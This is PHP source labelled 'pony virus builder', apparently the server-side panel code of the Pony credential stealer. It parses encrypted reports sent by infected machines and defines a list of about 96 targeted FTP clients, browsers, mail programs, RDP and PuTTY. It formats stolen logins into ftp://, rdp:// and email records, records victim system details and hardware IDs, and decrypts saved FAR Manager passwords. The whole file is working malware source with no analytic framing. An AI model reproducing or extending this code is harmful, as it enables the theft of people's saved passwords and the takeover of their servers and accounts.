pony virus builder .....php

1. <?php
2.  
3. /*
4.  
5. Password decryption and processing code.
6.  
7. */
8.  
9. define("REPORT_LEN_LIMIT", 1024*1024*32); // do not process reports with length greater than this limit
10. define("REPORT_HEADER", "PWDFILE0"); // each password report starts with this header
11. define("REPORT_PACKED_HEADER", "PKDFILE0"); // header indicating that report is packed
12. define("REPORT_CRYPTED_HEADER", "CRYPTED0"); // header indicating that report is encrypted
13. define("REPORT_VERSION", "1.0"); // supported report version
14. define("REPORT_MODULE_HEADER", chr(2).chr(0)."MODU".chr(1).chr(1)); // report module header, used for consistency checks
15. define("REPORT_ITEMHDR_ID", 0xbeef0000); // report item header, used for consistency checks
16. define("REPORT_DEFAULT_PASSWORD", "Mesoamerica"); // default report encryption password
17.  
18. define('VER_PLATFORM_WIN32_NT', 2);
19. define('VER_NT_WORKSTATION', 1);
20. define('PROCESSOR_ARCHITECTURE_AMD64', 9);
21.  
22. // module_class | module_id | module_name
23. $global_module_list = array(
24. array('module_systeminfo', 0x00000000, 'System Info'),
25. array("module_far", 0x00000001, 'FAR Manager'),
26. array("module_wtc", 0x00000002, 'Total Commander'),
27. array("module_ws_ftp", 0x00000003, 'WS_FTP'),
28. array("module_cuteftp", 0x00000004, 'CuteFTP'),
29. array("module_flashfxp", 0x00000005, 'FlashFXP'),
30. array("module_filezilla", 0x00000006, 'FileZilla'),
31. array("module_ftpcommander", 0x00000007, 'FTP Commander'),
32. array("module_bulletproof", 0x00000008, 'BulletProof FTP'),
33. array("module_smartftp", 0x00000009, 'SmartFTP'),
34. array("module_turboftp", 0x0000000a, 'TurboFTP'),
35. array("module_ffftp", 0x0000000b, 'FFFTP'),
36. array("module_coffeecupftp", 0x0000000c, 'CoffeeCup FTP / Sitemapper'),
37. array("module_coreftp", 0x0000000d, 'CoreFTP'),
38. array("module_ftpexplorer", 0x0000000e, 'FTP Explorer'),
39. array("module_frigateftp", 0x0000000f, 'Frigate3 FTP'),
40. array("module_securefx", 0x00000010, 'SecureFX'),
41. array("module_ultrafxp", 0x00000011, 'UltraFXP'),
42. array("module_ftprush", 0x00000012, 'FTPRush'),
43. array("module_websitepublisher", 0x00000013, 'WebSitePublisher'),
44. array("module_bitkinex", 0x00000014, 'BitKinex'),
45. array("module_expandrive", 0x00000015, 'ExpanDrive'),
46. array("module_classicftp", 0x00000016, 'ClassicFTP'),
47. array("module_fling", 0x00000017, 'Fling'),
48. array("module_softx", 0x00000018, 'SoftX'),
49. array("module_dopus", 0x00000019, 'Directory Opus'),
50. array("module_freeftp", 0x0000001a, 'FreeFTP / DirectFTP'),
51. array("module_leapftp", 0x0000001b, 'LeapFTP'),
52. array("module_winscp", 0x0000001c, 'WinSCP'),
53. array("module_32bitftp", 0x0000001d, '32bit FTP'),
54. array("module_netdrive", 0x0000001e, 'NetDrive'),
55. array("module_webdrive", 0x0000001f, 'WebDrive'),
56. array("module_ftpcontrol", 0x00000020, 'FTP Control'),
57. array("module_opera", 0x00000021, 'Opera'),
58. array("module_wiseftp", 0x00000022, 'WiseFTP'),
59. array("module_ftpvoyager", 0x00000023, 'FTP Voyager'),
60. array("module_firefox", 0x00000024, 'Firefox'),
61. array("module_fireftp", 0x00000025, 'FireFTP'),
62. array("module_seamonkey", 0x00000026, 'SeaMonkey'),
63. array("module_flock", 0x00000027, 'Flock'),
64. array("module_mozilla", 0x00000028, 'Mozilla'),
65. array("module_leechftp", 0x00000029, 'LeechFTP'),
66. array("module_odin", 0x0000002a, 'Odin Secure FTP Expert'),
67. array("module_winftp", 0x0000002b, 'WinFTP'),
68. array("module_ftp_surfer", 0x0000002c, 'FTP Surfer'),
69. array("module_ftpgetter", 0x0000002d, 'FTPGetter'),
70. array("module_alftp", 0x0000002e, 'ALFTP'),
71. array("module_ie", 0x0000002f, 'Internet Explorer'),
72. array("module_dreamweaver", 0x00000030, 'Dreamweaver'),
73. array("module_deluxeftp", 0x00000031, 'DeluxeFTP'),
74. array("module_chrome", 0x00000032, 'Google Chrome'),
75. array("module_chromium", 0x00000033, 'Chromium / SRWare Iron'),
76. array("module_chromeplus", 0x00000034, 'ChromePlus'),
77. array("module_bromium", 0x00000035, 'Bromium (Yandex Chrome)'),
78. array("module_nichrome", 0x00000036, 'Nichrome'),
79. array("module_comododragon", 0x00000037, 'Comodo Dragon'),
80. array("module_rockmelt", 0x00000038, 'RockMelt'),
81. array("module_kmeleon", 0x00000039, 'K-Meleon'),
82. array("module_epic", 0x0000003a, 'Epic'),
83. array("module_staff", 0x0000003b, 'Staff-FTP'),
84. array("module_aceftp", 0x0000003c, 'AceFTP'),
85. array("module_globaldownloader", 0x0000003d, 'Global Downloader'),
86. array("module_freshftp", 0x0000003e, 'FreshFTP'),
87. array("module_blazeftp", 0x0000003f, 'BlazeFTP'),
88. array("module_netfile", 0x00000040, 'NETFile'),
89. array("module_goftp", 0x00000041, 'GoFTP'),
90. array("module_3dftp", 0x00000042, '3D-FTP'),
91. array("module_easyftp", 0x00000043, 'Easy FTP'),
92. array("module_xftp", 0x00000044, 'Xftp'),
93. array("module_rdp", 0x00000045, 'RDP'),
94. array("module_ftpnow", 0x00000046, 'FTP Now'),
95. array("module_roboftp", 0x00000047, 'Robo-FTP'),
96. array("module_cert", 0x00000048, 'Certificate'),
97. array("module_linasftp", 0x00000049, 'LinasFTP'),
98. array("module_cyberduck", 0x0000004a, 'Cyberduck'),
99. array("module_putty", 0x0000004b, 'Putty'),
100. array("module_notepadpp", 0x0000004c, 'Notepad++'),
101. array("module_vs_designer", 0x0000004d, 'CoffeeCup Visual Site Designer'),
102. array("module_ftpshell", 0x0000004e, 'FTPShell'),
103. array("module_ftpinfo", 0x0000004f, 'FTPInfo'),
104. array("module_nexusfile", 0x00000050, 'NexusFile'),
105. array("module_fs_browser", 0x00000051, 'FastStone Browser'),
106. array("module_coolnovo", 0x00000052, 'CoolNovo'),
107. array("module_winzip", 0x00000053, 'WinZip'),
108. array("module_yandexinternet", 0x00000054, 'Yandex.Internet'),
109. array("module_myftp", 0x00000055, 'MyFTP'),
110. array("module_sherrodftp", 0x00000056, 'sherrod FTP'),
111. array("module_novaftp", 0x00000057, 'NovaFTP'),
112. array("module_windows_mail", 0x00000058, 'Windows Mail'),
113. array("module_windows_live_mail", 0x00000059, 'Windows Live Mail'),
114. array("module_becky", 0x0000005a, 'Becky!'),
115. array("module_pocomail", 0x0000005b, 'Pocomail'),
116. array("module_incredimail", 0x0000005c, 'IncrediMail'),
117. array("module_thebat", 0x0000005d, 'The Bat!'),
118. array("module_outlook", 0x0000005e, 'Outlook'),
119. array("module_thunderbird", 0x0000005f, 'Thunderbird'),
120. array("module_fasttrack", 0x00000060, 'FastTrack'),
121. );
122.  
123. // convert module classname to ftp-client name
124. function module_name_to_client_name($module_name)
125. {
126. global $global_module_list;
127. foreach ($global_module_list as $module)
128. {
129. if ($module_name == $module[0])
130. return $module[2];
131. }
132. return '';
133. }
134.  
135. // data stream processing class
136. class stream
137. {
138. protected $log;
139.  
140. // data copy
141. private $data = array();
142.  
143. // current position
144. public $pos = 0;
145.  
146. // data length
147. public $datalen = 0;
148.  
149. // state indicates read error
150. public $state = false;
151.  
152. // states indicating that first error message is already in the log list
153. public $push_error_state = true;
154.  
155. function __construct($data, $log)
156. {
157. $this->data = $data;
158. $this->datalen = strlen($this->data);
159. $this->state = true;
160. $this->log = $log;
161. }
162.  
163. // write the first error message only to avoid log garbage
164. protected function push_error($error_msg)
165. {
166. $this->state = false;
167. if ($this->push_error_state)
168. {
169. $this->log->add($error_msg);
170. $this->push_error_state = false;
171. }
172. }
173.  
174. function read_skip($len)
175. {
176. if (($this->pos + $len > $this->datalen) || !$this->state || $len < 0)
177. {
178. $this->push_error("ERR_SKIP_FAIL");
179. return false;
180. }
181.  
182. $this->pos += $len;
183. return true;
184. }
185.  
186. function read_byte()
187. {
188. if ((($this->pos + 1) > $this->datalen) || !$this->state)
189. {
190. $this->push_error("ERR_BYTE_READ_FAIL");
191. return false;
192. }
193. $p = $this->pos;
194. $this->pos += 1;
195. return (int)ord($this->data[$p]);
196. }
197.  
198. function read_word()
199. {
200. if ((($this->pos + 2) > $this->datalen) || !$this->state)
201. {
202. $this->push_error("ERR_WORD_READ_FAIL");
203. return false;
204. }
205. $p = $this->pos;
206. $this->pos += 2;
207. return (int)((int)ord($this->data[$p+1]) << 8 |
208. (int)ord($this->data[$p]));
209. }
210.  
211. function read_dword()
212. {
213. if (($this->pos + 4 > $this->datalen) || !$this->state)
214. {
215. $this->push_error("ERR_DWORD_READ_FAIL");
216. return false;
217. }
218. $p = $this->pos;
219. $this->pos += 4;
220. return data_int32(substr($this->data, $p, 4));
221. }
222.  
223. function read_strlen($len)
224. {
225. if (($this->pos + $len > $this->datalen) || !$this->state || $len < 0)
226. {
227. $this->push_error("ERR_STRLEN_READ_FAIL");
228. return false;
229. }
230.  
231. // empty string
232. if (!$len)
233. return "";
234.  
235. $p = $this->pos;
236. $this->pos += $len;
237. return substr($this->data, $p, $len);
238. }
239.  
240. // len (dword) + string
241. function read_str()
242. {
243. $len = $this->read_dword();
244. if (!$this->state || $len < 0)
245. {
246. $this->push_error("ERR_STR_READ_FAIL");
247. return false;
248. }
249.  
250. // empty string
251. if (!$len)
252. return "";
253.  
254. if (($this->pos + $len > $this->datalen))
255. {
256. $this->push_error("ERR_STR_READ_FAIL");
257. return false;
258. }
259. $r = substr($this->data, $this->pos, $len);
260. $this->pos += $len;
261. return $r;
262. }
263.  
264. function eof()
265. {
266. if (!$this->state)
267. return false;
268. return $this->pos >= $this->datalen;
269. }
270.  
271. function seek($new_pos)
272. {
273. if (!$this->state)
274. return false;
275. if ($new_pos > $this->datalen || $new_pos < 0)
276. {
277. $this->push_error("ERR_SEEK_FAIL");
278. return false;
279. } else
280. {
281. $this->pos = $new_pos;
282. return true;
283. }
284. }
285. }
286.  
287. // base class for all password module descendants
288. abstract class module
289. {
290. protected $stream;
291. protected $log;
292. protected $options = array();
293.  
294. public $ftp_list = array();
295. public $http_list = array();
296. public $rdp_list = array();
297. public $cert_list = array();
298. public $email_list = array();
299.  
300. function __construct($stream, $log, $options = '')
301. {
302. $this->stream = $stream;
303. $this->log = $log;
304. if (is_array($options))
305. $this->options = $options;
306. }
307.  
308. // can be used (overloaded) by descendants to simplify data importing
309. protected function import_item($stream, $id)
310. {
311. return false;
312. }
313.  
314. // import binary data
315. public function import_data($module_len)
316. {
317. $module_end_pos = (int)$this->stream->pos + (int)$module_len;
318. // process data untill module stream end
319. while ($this->stream->pos < $module_end_pos)
320. {
321. // data item identifier dword
322. $id = $this->stream->read_dword();
323. // higher 2 bytes are used as a header for data consistency check
324. if ((int)($id & REPORT_ITEMHDR_ID) != (int)REPORT_ITEMHDR_ID)
325. {
326. $this->log->add("ERR_INVALID_ITEMHDR"); // this is really bad
327. return false;
328. }
329. // filter item identifier
330. $id = (int)$id & 0xffff;
331. if (!$this->import_item($this->stream, $id))
332. return false;
333. }
334. // if data was imported successfully, current and predicted positions should match
335. return ((int)$module_end_pos == (int)$this->stream->pos);
336. }
337.  
338. // build ftp line
339. private function build_url_line($scheme, $user, $pass, $host, $port, $path, $http_mode)
340. {
341. if ((!is_valid_host($host) && !is_valid_ip_filter($host)) || !strlen($user) || !strlen($pass) || !strlen($scheme))
342. return "";
343.  
344. if ((strtolower($scheme) == 'sftp') && (assign($this->options['sftp_protocol']) == '1'))
345. $line = "sftp://".$user.":".$pass;
346. else if (strtolower($scheme) == 'http' && $http_mode)
347. $line = "http://".$user.":".$pass;
348. else if (strtolower($scheme) == 'https' && $http_mode)
349. $line = "https://".$user.":".$pass;
350. else
351. {
352. if ($http_mode)
353. $line = "http://".$user.":".$pass;
354. else
355. {
356. if (($port == 22) && (assign($this->options['sftp_port']) == '1'))
357. $line = "sftp://".$user.":".$pass;
358. else
359. {
360. if (($user == 'root') && (assign($this->options['sftp_user']) == '1'))
361. $line = "sftp://".$user.":".$pass;
362. else
363. $line = "ftp://".$user.":".$pass;
364. }
365. }
366. }
367.  
368. $line .= "@".$host;
369. $port = strval($port);
370. if (strlen($port) && is_num($port))
371. $line .= ":".$port;
372. if (strlen($path) && ($path[0] == "/") && ($path != "/"))
373. $line .= $path;
374. return $line;
375. }
376.  
377. // add ftp line into $ftp_list
378. // apply data filter before addition
379. protected function insert_ftp_line($ftp_formatted_value)
380. {
381. $ftp_formatted_value = trim($ftp_formatted_value);
382. if (strlen($ftp_formatted_value) == 0)
383. return;
384.  
385. // filter ftp fully formatted lines
386. global $global_filter_list, $global_allow_all_ftp;
387.  
388. foreach ($global_filter_list as $filter_line)
389. {
390. if (stripos($ftp_formatted_value, $filter_line) !== false)
391. if (!$global_allow_all_ftp)
392. return;
393. }
394.  
395. array_push($this->ftp_list, $ftp_formatted_value);
396. }
397.  
398. // add http line into $http_list
399. // apply data filter before addition
400. protected function insert_http_line($http_formatted_value)
401. {
402. $http_formatted_value = trim($http_formatted_value);
403. if (strlen($http_formatted_value) == 0)
404. return;
405.  
406. // filter ftp fully formatted lines
407. global $global_filter_list, $global_allow_all_ftp;
408.  
409. foreach ($global_filter_list as $filter_line)
410. {
411. if (stripos($http_formatted_value, $filter_line) !== false)
412. if (!$global_allow_all_ftp)
413. return;
414. }
415.  
416. array_push($this->http_list, $http_formatted_value);
417. }
418.  
419. // process ftp/http(s) URL
420. // http_mode - process url as http(s) line (http://user:pass@host.com)
421. protected function add_ftp($url, $extra_user = "", $extra_pass = "", $http_mode = false)
422. {
423. // check stream state
424. if (!$this->stream->state)
425. return false;
426.  
427. // empty host
428. $url = trim($url);
429. if (strlen($url) == 0 || strtolower($url) == 'ftp://' || strtolower($url) == 'ftps://' || strtolower($url) == 'ftpes://' || strtolower($url) == 'sftp://' || strtolower($url) == 'esftp://' ||
430. strtolower($url) == 'http://' || strtolower($url) == 'https://' || strtolower($url) == 'sftp://:22')
431. return false;
432.  
433. // do not process FTP URIs without user/pass stored
434. $extra_user = trim($extra_user);
435. $extra_pass = trim($extra_pass);
436. if ((strpos($url, '@') === false) && (!strlen(trim($extra_pass)) && (!strlen(trim($extra_user)))))
437. {
438. global $global_allow_all_ftp;
439. if (!$global_allow_all_ftp)
440. return false;
441. }
442.  
443. // strip protocol value for
444. $url_protocol = '';
445. if (($p = strpos($url, "://")) !== false)
446. {
447. $url_protocol = substr($url, 0, $p+3);
448. $url = substr($url, $p+3);
449. }
450.  
451. // fix '#' chars in URL
452. $url = str_replace("#", '_thisissuberurlharacter_', $url);
453.  
454. // fix URL path slashes '\' -> '/'
455. // fix '/' chars in user:password values
456. $p = strrpos($url, "@");
457. if ($p !== false)
458. {
459. // do not replace slashes inside username:password values
460. $v1 = str_replace("/", '_thisissuperunreadablecharacter_', substr($url, 0, $p));
461. // replace '//' -> '/' in directory path
462. $v2 = str_replace("//", "/", str_replace("\\", "/", substr($url, $p)));
463. $url = $v1.$v2;
464. } else
465. {
466. // plain url, no user:password@ stored
467. // replace '\' -> '/'
468. // replace '//' -> '/' in directory path
469. $url = str_replace('//', '/', str_replace("\\", "/", $url));
470. }
471.  
472. $url = $url_protocol.$url;
473. // no protocol specified, assume it's an ftp:// | http://
474. if (strpos($url, "://") === false)
475. {
476. if ($http_mode)
477. $url = "http://".$url;
478. else
479. $url = "ftp://".$url;
480. }
481.  
482. // fix ftp:/// urls
483. $url = str_replace('ftp:///', 'ftp://', $url);
484.  
485. error_reporting(0);
486. $r = parse_url($url);
487. error_reporting(E_ALL);
488.  
489. if (is_array($r))
490. foreach ($r as $key=>$value)
491. {
492. $r[$key] = str_replace('_thisissuperunreadablecharacter_', '/', $r[$key]);
493. $r[$key] = str_replace('_thisissuberurlharacter_', '#', $r[$key]);
494. // remove everything after # char in host & path parts
495. if (($key == 'host' || $key == 'path') && strpos($r[$key], '#') !== false)
496. {
497. $r[$key] = substr($r[$key], 0, strpos($r[$key], '#'));
498. }
499. }
500.  
501. if ($r && nonempty($r["host"]) && (is_valid_host($r["host"]) || is_valid_ip_filter($r["host"])))
502. {
503. $r["scheme"] = strtolower(assign($r["scheme"]));
504. if (($r["scheme"] == "ftp") ||
505. ($r["scheme"] == "ftps") ||
506. ($r["scheme"] == "ftpes") ||
507. ($r["scheme"] == "sftp") ||
508. ($r["scheme"] == "esftp") ||
509. ($r["scheme"] == "http" && $http_mode == true) ||
510. ($r["scheme"] == "https" && $http_mode == true)
511. )
512. {
513. // specified port
514. $port = "";
515. if (nonempty($r["port"]) && is_num($r["port"]))
516. $port = $r["port"];
517.  
518. if ($http_mode == false && $port == "21")
519. $port = "";
520.  
521. if ($http_mode == true && $port == "80")
522. $port = "";
523.  
524. // specified remote ftp directory (path)
525. $path = assign($r["path"]);
526.  
527. // format the output string
528.  
529. // ftp with URL encoded user:password
530. $line = "";
531. if (nonempty($r["user"]) && nonempty($r["pass"]))
532. $line = $this->build_url_line($r["scheme"], $r["user"], $r["pass"],
533. $r["host"], $port, $path, $http_mode);
534. if (strlen($line))
535. {
536. if ($http_mode)
537. $this->insert_http_line($line);
538. else
539. $this->insert_ftp_line($line);
540. }
541.  
542. // ftp with extra user:passwords arguments
543. $line = "";
544. if (strlen($extra_user) && strlen($extra_pass))
545. $line = $this->build_url_line($r["scheme"], $extra_user, $extra_pass,
546. $r["host"], $port, $path, $http_mode);
547. if (!strlen($extra_user) && strlen($extra_pass) && nonempty($r["user"]))
548. $line = $this->build_url_line($r["scheme"], $r['user'], $extra_pass,
549. $r["host"], $port, $path, $http_mode);
550. if ($line)
551. {
552. if ($http_mode)
553. $this->insert_http_line($line);
554. else
555. $this->insert_ftp_line($line);
556. }
557.  
558. return true;
559. } else {
560. if (trim($r['scheme']) !== '')
561. $this->log->add("NOTIFY_INVALID_URL_SCHEME: ".$r["scheme"]);
562. }
563. } elseif (!$r)
564. {
565. // revert fixed characters
566. $url = str_replace('_thisissuperunreadablecharacter_', '/', $url);
567. $url = str_replace('_thisissuberurlharacter_', '#', $url);
568. $this->log->add("NOTIFY_CANNOT_PARSE_URL: $url");
569. }
570. return false;
571. }
572.  
573. protected function add_http($url, $extra_user = "", $extra_pass = "")
574. {
575. $this->add_ftp($url, $extra_user, $extra_pass, true);
576. }
577.  
578. protected function add_rdp($server, $user, $pass)
579. {
580. global $global_filter_list;
581.  
582. $server = trim($server);
583. $user = trim($user);
584. $pass = trim($pass);
585.  
586. if ((!is_valid_host($server) && !is_valid_ip_filter($server)) || !strlen($server) || !strlen($user) || !strlen($pass))
587. {
588. return;
589. }
590.  
591. $rdp_formatted_value = 'rdp://'.$user.':'.$pass.'@'.$server;
592.  
593. foreach ($global_filter_list as $filter_line)
594. {
595. if (stripos($rdp_formatted_value, $filter_line) !== false)
596. {
597. global $global_allow_all_ftp;
598. if (!$global_allow_all_ftp)
599. return;
600. }
601. }
602.  
603. array_push($this->rdp_list, $rdp_formatted_value);
604. }
605.  
606. protected function add_cert($cert, $pvt_key)
607. {
608. if (strlen($cert) && strlen($pvt_key))
609. {
610. array_push($this->cert_list, array($cert, $pvt_key));
611. }
612. }
613.  
614. protected function add_email($email, $protocol, $server, $port, $user, $pass)
615. {
616. $email = trim($email);
617. $protocol = strtolower(trim($protocol));
618. $server = trim($server);
619. $user = trim($user);
620. $pass = trim($pass);
621. $port = trim($port);
622. $port = strval(intval($port));
623.  
624. if ($port == '0')
625. {
626. $port = '';
627. }
628.  
629. // validate protocol
630. if ($protocol != 'smtp' && $protocol != 'imap' && $protocol != 'pop3' && $protocol != 'http')
631. {
632. return false;
633. }
634.  
635. // do not allow empty values
636. if (!strlen($email) || !strlen($server) || !strlen($user) || !strlen($pass))
637. {
638. return false;
639. }
640.  
641. // validate email address
642. if (!is_valid_email($email))
643. {
644. return false;
645. }
646.  
647. // check if port is stored in server value
648. $port_pos = strpos($server, ':');
649. $stored_port = '';
650. if ($port_pos !== false)
651. {
652. if ($port == '')
653. {
654. $port = strval(intval(trim(substr($server, $port_pos+1))));
655. if ($port == '0')
656. $port = '';
657. } else
658. {
659. $stored_port = strval(intval(trim(substr($server, $port_pos+1))));
660. if ($stored_port == '0')
661. $stored_port = '';
662. }
663. // cut stored port
664. $server = substr($server, 0, $port_pos);
665. }
666.  
667. // validate server host/ip
668. if (!is_valid_host($server) && !is_valid_ip_filter($server))
669. {
670. return false;
671. }
672.  
673. // do not store default port value
674. switch ($protocol)
675. {
676. case 'smtp':
677. if ($port == '25')
678. $port = '';
679. if ($stored_port == '25')
680. $stored_port = '';
681. break;
682. case 'imap':
683. if ($port == '143')
684. $port = '';
685. if ($stored_port == '143')
686. $stored_port = '';
687. break;
688. case 'pop3':
689. if ($port == '110')
690. $port = '';
691. if ($stored_port == '110')
692. $stored_port = '';
693. break;
694. case 'http':
695. if ($port == '80')
696. $port = '';
697. if ($stored_port == '80')
698. $stored_port = '';
699. break;
700. }
701.  
702. array_push($this->email_list, array('email'=>$email, 'protocol'=>$protocol, 'server'=>$server, 'port'=>$port, 'user'=>$user, 'pass'=>$pass));
703.  
704. if (strlen($stored_port))
705. {
706. array_push($this->email_list, array('email'=>$email, 'protocol'=>$protocol, 'server'=>$server, 'port'=>$stored_port, 'user'=>$user, 'pass'=>$pass));
707. }
708.  
709. return true;
710. }
711. }
712.  
713. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
714. // System Information
715.  
716. class module_systeminfo extends module
717. {
718. public $os_name;
719. public $is_win64;
720. public $user_country;
721. public $user_language;
722. public $is_admin;
723. public $hwid;
724.  
725. protected function detect_os($version_info, $system_info)
726. {
727. if (strlen($version_info) <= 4)
728. return false;
729.  
730. if (strlen($system_info) == 36)
731. {
732. $system_info_stream = new stream($system_info, $this->log);
733. $wProcessorArchitecture = $system_info_stream->read_word();
734. } else
735. $wProcessorArchitecture = 0;
736.  
737. $info_stream = new stream($version_info, $this->log);
738.  
739. $dwOSVersionInfoSize = $info_stream->read_dword();
740.  
741. if ($dwOSVersionInfoSize != strlen($version_info))
742. {
743. return false;
744. }
745.  
746. $dwMajorVersion = $info_stream->read_dword();
747. $dwMinorVersion = $info_stream->read_dword();
748. /*$dwBuildNumber = */$info_stream->read_dword();
749. $dwPlatformId = $info_stream->read_dword();
750. $szCSDVersion = $info_stream->read_strlen(128);
751. $wServicePackMajor = $info_stream->read_word();
752. /*$wServicePackMinor = */$info_stream->read_word();
753. /*$wSuiteMask = */$info_stream->read_word();
754. $wProductType = $info_stream->read_byte();
755. /*$wReserved = */ $info_stream->read_byte();
756.  
757. $os_name = 'Windows';
758.  
759. switch ($dwMajorVersion)
760. {
761. case 3:
762. if ($dwMinorVersion == 51)
763. $os_name .= ' NT 3.51';
764. break;
765. case 4:
766. switch ($dwMinorVersion)
767. {
768. case 0:
769. if ($dwPlatformId == VER_PLATFORM_WIN32_NT)
770. $os_name .= ' NT 4.0';
771. else
772. {
773. $os_name .= ' 95';
774. if ($szCSDVersion[1] == 'C' || $szCSDVersion[1] == 'B')
775. $os_name .= ' OSR2';
776. }
777. break;
778. case 10:
779. $os_name .= ' 98';
780. if ($szCSDVersion[1] == 'A')
781. $os_name .= ' SE';
782. break;
783. case 90:
784. $os_name .= ' Me';
785. break;
786. }
787. break;
788. case 5:
789. switch ($dwMinorVersion)
790. {
791. case 0:
792. $os_name .= ' 2000';
793. break;
794. case 1:
795. $os_name .= ' XP';
796. break;
797. case 2:
798. if ($wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 && $wProductType == VER_NT_WORKSTATION)
799. $os_name .= ' XP'; // Windows XP Professional x64 Edition
800. else
801. $os_name .= ' Server 2003';
802. break;
803. }
804. break;
805. case 6:
806. switch ($dwMinorVersion)
807. {
808. case 0:
809. if ($wProductType == VER_NT_WORKSTATION)
810. $os_name .= ' Vista';
811. else
812. $os_name .= ' Server 2008';
813. break;
814. case 1:
815. if ($wProductType == VER_NT_WORKSTATION)
816. $os_name .= ' 7';
817. else
818. $os_name .= ' Server 2008 R2';
819. break;
820. case 2:
821. $os_name .= ' 8';
822. break;
823. }
824. break;
825. }
826.  
827. if ($dwPlatformId == VER_PLATFORM_WIN32_NT)
828. {
829. //$csd = ztrim($szCSDVersion);
830. //if ($csd)
831. //{
832. // $os_name .= ' '.$csd;
833. //}
834. if ($wServicePackMajor > 0)
835. {
836. $os_name .= ' SP '.strval($wServicePackMajor);
837. }
838. }
839.  
840. return trim($os_name);
841. }
842.  
843. protected function process_hwid($HwProfileInfo)
844. {
845. return trim(ztrim(substr($HwProfileInfo, 4)));
846. }
847.  
848. protected function import_item($stream, $id)
849. {
850. switch ($id)
851. {
852. case 0x0000:
853. case 0x0001:
854. $version_info = $stream->read_str();
855. $this->is_win64 = $stream->read_dword();
856. $this->user_country = $stream->read_str();
857. $this->user_language = $stream->read_str();
858. $this->is_admin = $stream->read_dword();
859. $this->hwid = $this->process_hwid($stream->read_str());
860. if ($id > 0)
861. {
862. $system_info = $stream->read_str();
863. } else
864. $system_info = '';
865.  
866. $this->os_name = $this->detect_os($version_info, $system_info);
867.  
868. break;
869. default:
870. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
871. return false;
872. }
873. return true;
874. }
875. }
876.  
877. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
878. // FAR Manager
879.  
880. class module_far extends module
881. {
882. protected function Dos2Win($text)
883. {
884. $CTable = array(
885. 0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0A,0x0B,0x0C,0x0D,0x0E,0x0F,
886. 0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0x18,0x19,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,
887. 0x20,0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28,0x29,0x2A,0x2B,0x2C,0x2D,0x2E,0x2F,
888. 0x30,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3A,0x3B,0x3C,0x3D,0x3E,0x3F,
889. 0x40,0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,
890. 0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,0x5B,0x5C,0x5D,0x5E,0x5F,
891. 0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6C,0x6D,0x6E,0x6F,
892. 0x70,0x71,0x72,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7A,0x7B,0x7C,0x7D,0x7E,0x7F,
893. 0xC0,0xC1,0xC2,0xC3,0xC4,0xC5,0xC6,0xC7,0xC8,0xC9,0xCA,0xCB,0xCC,0xCD,0xCE,0xCF,
894. 0xD0,0xD1,0xD2,0xD3,0xD4,0xD5,0xD6,0xD7,0xD8,0xD9,0xDA,0xDB,0xDC,0xDD,0xDE,0xDF,
895. 0xE0,0xE1,0xE2,0xE3,0xE4,0xE5,0xE6,0xE7,0xE8,0xE9,0xEA,0xEB,0xEC,0xED,0xEE,0xEF,
896. 0xB0,0xB1,0xB2,0xA6,0xB4,0xB5,0xB6,0xB7,0xB8,0xB9,0xBA,0xBB,0xBC,0xBD,0xBE,0xAC,
897. 0xC0,0xC1,0xC2,0xC3,0xC4,0x86,0xC6,0xC7,0xC8,0xC9,0xCA,0xCB,0xCC,0xCD,0xCE,0xCF,
898. 0xD0,0xD1,0xD2,0xD3,0xD4,0xD5,0xD6,0xD7,0x87,0xD9,0xDA,0xDB,0xDC,0xDD,0xDE,0xDF,
899. 0xF0,0xF1,0xF2,0xF3,0xF4,0xF5,0xF6,0xB5,0xF8,0xF9,0xFA,0xFB,0xFC,0xFD,0xFE,0xFF,
900. 0xA8,0xB8,0xAA,0xBA,0xAF,0xBF,0xA1,0xA2,0xB0,0xF9,0xB7,0xFB,0xB9,0xA4,0xFE,0xA0
901. );
902. for ($i = 0; $i < strlen($text); $i++)
903. $text[$i] = chr($CTable[ord($text[$i])]);
904. return $text;
905. }
906.  
907. protected function decrypt($pass)
908. {
909. if (strlen($pass) < 3)
910. return "";
911. $result = "";
912. $key = ord($pass[0]) ^ ord($pass[1]) | 0x50;
913. for ($i = 2; $i < strlen($pass); $i++)
914. {
915. if (ord($pass[$i]) == 0)
916. break;
917. $result .= chr(ord($pass[$i]) ^ $key);
918. }
919. return $result;
920. }
921.  
922. protected function import_item($stream, $id)
923. {
924. switch ($id)
925. {
926. case 0x0000:
927. // saved plugin passwords
928. $host = $this->dos2win($stream->read_str());
929. $user = $this->dos2win($stream->read_str());
930. $pass = $this->dos2win($this->decrypt($stream->read_str()));
931. $this->add_ftp($host, $user, $pass);
932. break;
933. case 0x0001:
934. // history
935. $type = $stream->read_dword();
936. $uri = $stream->read_str();
937. if (!$stream->state)
938. return false;
939. if ($type == 0)
940. {
941. // REG_SZ
942. $this->add_ftp($uri);
943. } else if($type == 1)
944. {
945. // REG_MULTI_SZ
946. $a = explode(chr(0), $uri);
947. foreach ($a as $line)
948. $this->add_ftp($line);
949. } else
950. {
951. $this->log->add("ERR_UNKNOWN_FAR_HISTORY_TYPE");
952. return false;
953. }
954. break;
955. default:
956. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
957. return false;
958. }
959. return true;
960. }
961. }
962.  
